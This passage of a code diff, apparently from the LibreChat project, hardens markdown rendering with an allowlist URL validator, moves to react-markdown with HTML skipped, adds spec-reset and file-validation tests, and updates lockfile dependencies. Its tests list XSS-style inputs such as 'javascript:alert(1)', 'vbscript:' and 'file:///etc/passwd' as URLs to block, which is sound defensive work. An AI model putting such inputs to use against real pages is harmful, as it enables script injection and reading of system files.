javascript:alert(1)')).toBe(false); + }); + + it('blocks javascript: with mixed case', () => { + expect(isSafeUrl('JavaScript:alert(1)')).toBe(false); + }); + + it('blocks data: protocol', () => { + expect(isSafeUrl('data:text/html,x')).toBe(false); + }); + + it('blocks blob: protocol', () => { + expect(isSafeUrl('blob:http://example.com/uuid')).toBe(false); + }); + + it('blocks vbscript: protocol', () => { + expect(isSafeUrl('vbscript:MsgBox("xss")')).toBe(false); + }); + + it('blocks file: protocol', () => { + expect(isSafeUrl('file:///etc/passwd')).toBe(false); + }); + + it('blocks empty strings', () => { + expect(isSafeUrl('')).toBe(false); + }); + + it('blocks whitespace-only strings', () => { + expect(isSafeUrl(' ')).toBe(false); + }); + + it('blocks unknown/custom protocols', () => { + expect(isSafeUrl('custom:payload')).toBe(false); + }); +}); describe('markdown artifacts', () => { describe('getMarkdownFiles', () => { @@ -41,7 +109,7 @@ describe('markdown artifacts', () => { const markdown = '# Test'; const files = getMarkdownFiles(markdown); - expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import Markdown from'); + expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import ReactMarkdown from'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('MarkdownRendererProps'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain( 'export default MarkdownRenderer', @@ -162,13 +230,29 @@ describe('markdown artifacts', () => { }); describe('markdown component structure', () => { - it('should generate a MarkdownRenderer component that uses marked-react', () => { + it('should generate a MarkdownRenderer component with safe markdown rendering', () => { const files = getMarkdownFiles('# Test'); const rendererCode = files['/components/ui/MarkdownRenderer.tsx']; - // Verify the component imports and uses Markdown from marked-react - expect(rendererCode).toContain("import Markdown from 'marked-react'"); - 
expect(rendererCode).toContain('{content}'); + expect(rendererCode).toContain("import ReactMarkdown from 'react-markdown'"); + expect(rendererCode).toContain("import remarkBreaks from 'remark-breaks'"); + expect(rendererCode).toContain('skipHtml={true}'); + expect(rendererCode).toContain('SAFE_PROTOCOLS'); + expect(rendererCode).toContain('isSafeUrl'); + expect(rendererCode).toContain('urlTransform={urlTransform}'); + expect(rendererCode).toContain('remarkPlugins={remarkPlugins}'); + expect(rendererCode).toContain('isSafeUrl(url) ? url : null'); + }); + + it('should embed isSafeUrl logic matching the exported version', () => { + const files = getMarkdownFiles('# Test'); + const rendererCode = files['/components/ui/MarkdownRenderer.tsx']; + + expect(rendererCode).toContain("new Set(['http:', 'https:', 'mailto:', 'tel:'])"); + expect(rendererCode).toContain('new URL(trimmed).protocol'); + expect(rendererCode).toContain("trimmed.startsWith('/')"); + expect(rendererCode).toContain("trimmed.startsWith('#')"); + expect(rendererCode).toContain("trimmed.startsWith('.')"); }); it('should pass markdown content to the Markdown component', () => { diff --git a/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts b/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts new file mode 100644 index 0000000000..76e104f62f --- /dev/null +++ b/client/src/utils/__tests__/mergeQuerySettingsWithSpec.test.ts @@ -0,0 +1,152 @@ +import { EModelEndpoint } from 'librechat-data-provider'; +import type { TPreset } from 'librechat-data-provider'; +import { mergeQuerySettingsWithSpec, specDisplayFieldReset } from '../endpoints'; + +describe('mergeQuerySettingsWithSpec', () => { + const specPreset: TPreset = { + endpoint: EModelEndpoint.openAI, + model: 'gpt-4', + spec: 'my-spec', + iconURL: 'https://example.com/icon.png', + modelLabel: 'My Custom GPT', + greeting: 'Hello from the spec!', + temperature: 0.7, + }; + + describe('when specPreset is active and query has no spec', () 
=> { + it('clears all spec display fields for agent share links', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.agent_id).toBe('agent_123'); + expect(result.endpoint).toBe(EModelEndpoint.agents); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + + it('preserves non-display settings from the spec base', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.temperature).toBe(0.7); + }); + + it('clears spec display fields for assistant share links', () => { + const querySettings: TPreset = { + assistant_id: 'asst_abc', + endpoint: EModelEndpoint.assistants, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.assistant_id).toBe('asst_abc'); + expect(result.endpoint).toBe(EModelEndpoint.assistants); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + + it('clears spec display fields for model override links', () => { + const querySettings: TPreset = { + model: 'claude-sonnet-4-20250514', + endpoint: EModelEndpoint.anthropic, + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.model).toBe('claude-sonnet-4-20250514'); + expect(result.endpoint).toBe(EModelEndpoint.anthropic); + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + }); + }); + + describe('when query explicitly sets a spec', () => { + it('preserves spec display fields from the base', () => { + const 
querySettings = { spec: 'other-spec' } as TPreset; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.spec).toBe('other-spec'); + expect(result.iconURL).toBe('https://example.com/icon.png'); + expect(result.modelLabel).toBe('My Custom GPT'); + expect(result.greeting).toBe('Hello from the spec!'); + }); + }); + + describe('when specPreset is undefined (no spec configured)', () => { + it('returns querySettings without injecting null display fields', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(undefined, querySettings); + + expect(result.agent_id).toBe('agent_123'); + expect(result.endpoint).toBe(EModelEndpoint.agents); + expect(result).not.toHaveProperty('spec'); + expect(result).not.toHaveProperty('iconURL'); + expect(result).not.toHaveProperty('modelLabel'); + expect(result).not.toHaveProperty('greeting'); + }); + }); + + describe('when querySettings is empty', () => { + it('still clears spec display fields (no query params is not an explicit spec)', () => { + const result = mergeQuerySettingsWithSpec(specPreset, {} as TPreset); + + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + expect(result.endpoint).toBe(EModelEndpoint.openAI); + expect(result.model).toBe('gpt-4'); + expect(result.temperature).toBe(0.7); + }); + }); + + describe('query settings override spec values', () => { + it('overrides endpoint and model from spec', () => { + const querySettings: TPreset = { + endpoint: EModelEndpoint.anthropic, + model: 'claude-sonnet-4-20250514', + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.endpoint).toBe(EModelEndpoint.anthropic); + expect(result.model).toBe('claude-sonnet-4-20250514'); + expect(result.temperature).toBe(0.7); + expect(result.spec).toBeNull(); + }); + 
}); +}); + +describe('specDisplayFieldReset', () => { + it('contains all spec display fields that need clearing', () => { + expect(specDisplayFieldReset).toEqual({ + spec: null, + iconURL: null, + modelLabel: null, + greeting: undefined, + }); + }); + + it('has exactly 4 fields', () => { + expect(Object.keys(specDisplayFieldReset)).toHaveLength(4); + }); +}); diff --git a/client/src/utils/__tests__/validateFiles.spec.ts b/client/src/utils/__tests__/validateFiles.spec.ts new file mode 100644 index 0000000000..6d690bf62a --- /dev/null +++ b/client/src/utils/__tests__/validateFiles.spec.ts @@ -0,0 +1,172 @@ +import { megabyte, fileConfig as defaultFileConfig } from 'librechat-data-provider'; +import type { EndpointFileConfig, FileConfig } from 'librechat-data-provider'; +import type { ExtendedFile } from '~/common'; +import { validateFiles } from '../files'; + +const supportedMimeTypes = defaultFileConfig.endpoints.default.supportedMimeTypes; + +function makeEndpointConfig(overrides: Partial = {}): EndpointFileConfig { + return { + fileLimit: 10, + fileSizeLimit: 25 * megabyte, + totalSizeLimit: 100 * megabyte, + supportedMimeTypes, + disabled: false, + ...overrides, + }; +} + +function makeFile(name: string, type: string, size: number): File { + const content = new ArrayBuffer(size); + return new File([content], name, { type }); +} + +function makeExtendedFile(overrides: Partial = {}): ExtendedFile { + return { + file_id: 'ext-1', + size: 1024, + progress: 1, + type: 'application/pdf', + ...overrides, + }; +} + +describe('validateFiles', () => { + let setError: jest.Mock; + let files: Map; + let endpointFileConfig: EndpointFileConfig; + const fileConfig: FileConfig | null = null; + + beforeEach(() => { + setError = jest.fn(); + files = new Map(); + endpointFileConfig = makeEndpointConfig(); + }); + + it('returns true when all checks pass', () => { + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, 
setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + expect(setError).not.toHaveBeenCalled(); + }); + + it('rejects when endpoint is disabled', () => { + endpointFileConfig = makeEndpointConfig({ disabled: true }); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled'); + }); + + it('rejects empty files (zero bytes)', () => { + const fileList = [makeFile('empty.pdf', 'application/pdf', 0)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_error_files_empty'); + }); + + it('rejects when fileLimit would be exceeded', () => { + endpointFileConfig = makeEndpointConfig({ fileLimit: 3 }); + files = new Map([ + ['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })], + ['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })], + ]); + const fileList = [ + makeFile('a.pdf', 'application/pdf', 1024), + makeFile('b.pdf', 'application/pdf', 2048), + ]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('File limit reached: 3 files'); + }); + + it('allows upload when exactly at fileLimit boundary', () => { + endpointFileConfig = makeEndpointConfig({ fileLimit: 3 }); + files = new Map([ + ['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })], + ['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })], + ]); + const fileList = [makeFile('a.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects unsupported MIME type', 
() => { + const fileList = [makeFile('data.xyz', 'application/x-unknown', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('Unsupported file type: application/x-unknown'); + }); + + it('rejects when file size equals fileSizeLimit (>= comparison)', () => { + const limit = 5 * megabyte; + endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit }); + const fileList = [makeFile('exact.pdf', 'application/pdf', limit)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith(`File size limit exceeded: ${limit / megabyte} MB`); + }); + + it('allows file just under fileSizeLimit', () => { + const limit = 5 * megabyte; + endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit }); + const fileList = [makeFile('under.pdf', 'application/pdf', limit - 1)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects when totalSizeLimit would be exceeded', () => { + const limit = 10 * megabyte; + endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 6 * megabyte })]]); + const fileList = [makeFile('big.pdf', 'application/pdf', 5 * megabyte)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith(`Total file size limit exceeded: ${limit / megabyte} MB`); + }); + + it('allows when totalSizeLimit is exactly met', () => { + const limit = 10 * megabyte; + endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 5 * megabyte })]]); + const fileList = [makeFile('fits.pdf', 'application/pdf', 5 * 
megabyte)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects duplicate files', () => { + files = new Map([ + [ + 'f1', + makeExtendedFile({ + file_id: 'f1', + file: makeFile('doc.pdf', 'application/pdf', 1024), + filename: 'doc.pdf', + size: 1024, + type: 'application/pdf', + }), + ], + ]); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_error_files_dupe'); + }); + + it('enforces check ordering: disabled before fileLimit', () => { + endpointFileConfig = makeEndpointConfig({ disabled: true, fileLimit: 1 }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled'); + }); + + it('enforces check ordering: fileLimit before fileSizeLimit', () => { + const limit = 1; + endpointFileConfig = makeEndpointConfig({ fileLimit: 1, fileSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]); + const fileList = [makeFile('huge.pdf', 'application/pdf', limit)]; + validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(setError).toHaveBeenCalledWith('File limit reached: 1 files'); + }); +}); diff --git a/client/src/utils/artifacts.ts b/client/src/utils/artifacts.ts index 13f3a23b47..e862d18a40 100644 --- a/client/src/utils/artifacts.ts +++ b/client/src/utils/artifacts.ts @@ -108,7 +108,9 @@ const mermaidDependencies = { }; const markdownDependencies = { - 'marked-react': '^2.0.0', + 'remark-gfm': '^4.0.0', + 'remark-breaks': '^4.0.0', + 'react-markdown': '^9.0.1', }; 
const dependenciesMap: Record< diff --git a/client/src/utils/endpoints.ts b/client/src/utils/endpoints.ts index 33aa7a8525..a27f71b8e9 100644 --- a/client/src/utils/endpoints.ts +++ b/client/src/utils/endpoints.ts @@ -311,6 +311,30 @@ export function getModelSpecPreset(modelSpec?: t.TModelSpec) { }; } +/** Fields set by a model spec that should be cleared when switching to a non-spec conversation. */ +export const specDisplayFieldReset = { + spec: null as string | null, + iconURL: null as string | null, + modelLabel: null as string | null, + greeting: undefined as string | undefined, +}; + +/** + * Merges a spec preset base with URL query settings, clearing spec display fields + * when the query doesn't explicitly set a spec. Prevents spec contamination on + * agent/assistant share links. + */ +export function mergeQuerySettingsWithSpec( + specPreset: t.TPreset | undefined, + querySettings: t.TPreset, +): t.TPreset { + return { + ...specPreset, + ...querySettings, + ...(specPreset != null && querySettings.spec == null ? specDisplayFieldReset : {}), + }; +} + /** Gets the default spec iconURL by order or definition. 
* * First, the admin defined default, then last selected spec, followed by first spec diff --git a/client/src/utils/files.ts b/client/src/utils/files.ts index b4d362d456..be81a31b79 100644 --- a/client/src/utils/files.ts +++ b/client/src/utils/files.ts @@ -251,7 +251,7 @@ export const validateFiles = ({ const currentTotalSize = existingFiles.reduce((total, file) => total + file.size, 0); if (fileLimit && fileList.length + files.size > fileLimit) { - setError(`You can only upload up to ${fileLimit} files at a time.`); + setError(`File limit reached: ${fileLimit} files`); return false; } @@ -282,19 +282,18 @@ export const validateFiles = ({ } if (!checkType(originalFile.type, mimeTypesToCheck)) { - console.log(originalFile); - setError('Currently, unsupported file type: ' + originalFile.type); + setError(`Unsupported file type: ${originalFile.type}`); return false; } if (fileSizeLimit && originalFile.size >= fileSizeLimit) { - setError(`File size exceeds ${fileSizeLimit / megabyte} MB.`); + setError(`File size limit exceeded: ${fileSizeLimit / megabyte} MB`); return false; } } if (totalSizeLimit && currentTotalSize + incomingTotalSize > totalSizeLimit) { - setError(`The total size of the files cannot exceed ${totalSizeLimit / megabyte} MB.`); + setError(`Total file size limit exceeded: ${totalSizeLimit / megabyte} MB`); return false; } diff --git a/client/src/utils/markdown.ts b/client/src/utils/markdown.ts index 12556c1a24..24d5105863 100644 --- a/client/src/utils/markdown.ts +++ b/client/src/utils/markdown.ts @@ -1,23 +1,70 @@ import dedent from 'dedent'; -const markdownRenderer = dedent(`import React, { useEffect, useState } from 'react'; -import Markdown from 'marked-react'; +const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']); + +/** + * Allowlist-based URL validator for markdown artifact rendering. + * Mirrored verbatim in the markdownRenderer template string below — + * any logic change MUST be applied to both copies. 
+ */ +export const isSafeUrl = (url: string): boolean => { + const trimmed = url.trim(); + if (!trimmed) { + return false; + } + if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) { + return true; + } + try { + return SAFE_PROTOCOLS.has(new URL(trimmed).protocol); + } catch { + return false; + } +}; + +const markdownRenderer = dedent(`import React from 'react'; +import remarkGfm from 'remark-gfm'; +import remarkBreaks from 'remark-breaks'; +import ReactMarkdown from 'react-markdown'; interface MarkdownRendererProps { content: string; } +/** Mirror of the exported isSafeUrl in markdown.ts — keep in sync. */ +const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']); + +const isSafeUrl = (url: string): boolean => { + const trimmed = url.trim(); + if (!trimmed) return false; + if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) return true; + try { + return SAFE_PROTOCOLS.has(new URL(trimmed).protocol); + } catch { + return false; + } +}; + +const remarkPlugins = [remarkGfm, remarkBreaks]; +const urlTransform = (url: string) => (isSafeUrl(url) ? url : null); + const MarkdownRenderer: React.FC = ({ content }) => { return (
- {content} + + {content} +
); }; diff --git a/package-lock.json b/package-lock.json index a2db2df389..45f737ad8f 100644 --- a/package-lock.json +++ b/package-lock.json @@ -59,7 +59,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/api": "*", "@librechat/data-schemas": "*", "@microsoft/microsoft-graph-client": "^3.0.7", @@ -82,7 +82,7 @@ "express-rate-limit": "^8.3.0", "express-session": "^1.18.2", "express-static-gzip": "^2.2.0", - "file-type": "^18.7.0", + "file-type": "^21.3.2", "firebase": "^11.0.2", "form-data": "^4.0.4", "handlebars": "^4.7.7", @@ -124,7 +124,7 @@ "sharp": "^0.33.5", "traverse": "^0.6.7", "ua-parser-js": "^1.0.36", - "undici": "^7.18.2", + "undici": "^7.24.1", "winston": "^3.11.0", "winston-daily-rotate-file": "^5.0.0", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", @@ -270,6 +270,24 @@ "node": ">= 0.8.0" } }, + "api/node_modules/file-type": { + "version": "21.3.2", + "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz", + "integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==", + "license": "MIT", + "dependencies": { + "@tokenizer/inflate": "^0.4.1", + "strtok3": "^10.3.4", + "token-types": "^6.1.1", + "uint8array-extras": "^1.4.0" + }, + "engines": { + "node": ">=20" + }, + "funding": { + "url": "https://github.com/sindresorhus/file-type?sponsor=1" + } + }, "api/node_modules/jose": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", @@ -348,6 +366,40 @@ "@img/sharp-win32-x64": "0.33.5" } }, + "api/node_modules/strtok3": { + "version": "10.3.4", + "resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz", + "integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==", + "license": "MIT", + "dependencies": { + "@tokenizer/token": "^0.3.0" + }, + "engines": { + "node": 
">=18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, + "api/node_modules/token-types": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz", + "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==", + "license": "MIT", + "dependencies": { + "@borewit/text-codec": "^0.2.1", + "@tokenizer/token": "^0.3.0", + "ieee754": "^1.2.1" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "api/node_modules/winston-daily-rotate-file": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz", @@ -7286,6 +7338,16 @@ "dev": true, "license": "MIT" }, + "node_modules/@borewit/text-codec": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz", + "integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==", + "license": "MIT", + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "node_modules/@braintree/sanitize-url": { "version": "7.1.1", "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz", @@ -12262,9 +12324,9 @@ } }, "node_modules/@librechat/agents": { - "version": "3.1.55", - "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.55.tgz", - "integrity": "sha512-impxeKpCDlPkAVQFWnA6u6xkxDSBR/+H8uYq7rZomBeu0rUh/OhJLiI1fAwPhKXP33udNtHA8GyDi0QJj78R9w==", + "version": "3.1.56", + "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.56.tgz", + "integrity": "sha512-HJJwRnLM4XKpTWB4/wPDJR+iegyKBVUwqj7A8QHqzEcHzjKJDTr3wBPxZVH1tagGr6/mbbnErOJ14cH1OSNmpA==", "license": "MIT", "dependencies": { "@anthropic-ai/sdk": "^0.73.0", @@ -12285,6 +12347,7 @@ "@langfuse/tracing": 
"^4.3.0", "@opentelemetry/sdk-node": "^0.207.0", "@scarf/scarf": "^1.4.0", + "ai-tokenizer": "^1.0.6", "axios": "^1.13.5", "cheerio": "^1.0.0", "dotenv": "^16.4.7", @@ -20799,6 +20862,41 @@ "@testing-library/dom": ">=7.21.4" } }, + "node_modules/@tokenizer/inflate": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz", + "integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==", + "license": "MIT", + "dependencies": { + "debug": "^4.4.3", + "token-types": "^6.1.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, + "node_modules/@tokenizer/inflate/node_modules/token-types": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz", + "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==", + "license": "MIT", + "dependencies": { + "@borewit/text-codec": "^0.2.1", + "@tokenizer/token": "^0.3.0", + "ieee754": "^1.2.1" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "node_modules/@tokenizer/token": { "version": "0.3.0", "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz", @@ -27513,22 +27611,6 @@ "moment": "^2.29.1" } }, - "node_modules/file-type": { - "version": "18.7.0", - "resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz", - "integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==", - "dependencies": { - "readable-web-to-node-stream": "^3.0.2", - "strtok3": "^7.0.0", - "token-types": "^5.0.1" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "url": "https://github.com/sindresorhus/file-type?sponsor=1" - } - }, "node_modules/filelist": { "version": "1.0.6", "resolved": 
"https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz", @@ -28817,9 +28899,9 @@ "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" }, "node_modules/hono": { - "version": "4.12.5", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz", - "integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==", + "version": "4.12.7", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz", + "integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -35702,18 +35784,6 @@ "node-readable-to-web-readable-stream": "^0.4.2" } }, - "node_modules/peek-readable": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz", - "integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==", - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/pend": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", @@ -38519,21 +38589,6 @@ "node": ">= 6" } }, - "node_modules/readable-web-to-node-stream": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz", - "integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==", - "dependencies": { - "readable-stream": "^3.6.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/readdirp": { "version": "3.6.0", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", @@ -40920,22 +40975,6 @@ ], "license": "MIT" }, - "node_modules/strtok3": { - "version": "7.0.0", - 
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz", - "integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==", - "dependencies": { - "@tokenizer/token": "^0.3.0", - "peek-readable": "^5.0.0" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/style-inject": { "version": "0.3.0", "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz", @@ -41640,22 +41679,6 @@ "node": ">=0.6" } }, - "node_modules/token-types": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz", - "integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==", - "dependencies": { - "@tokenizer/token": "^0.3.0", - "ieee754": "^1.2.1" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/touch": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", @@ -42206,6 +42229,18 @@ "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" }, + "node_modules/uint8array-extras": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz", + "integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==", + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/unbox-primitive": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", @@ -42238,9 +42273,9 @@ "license": "MIT" }, "node_modules/undici": { - "version": "7.20.0", - "resolved": 
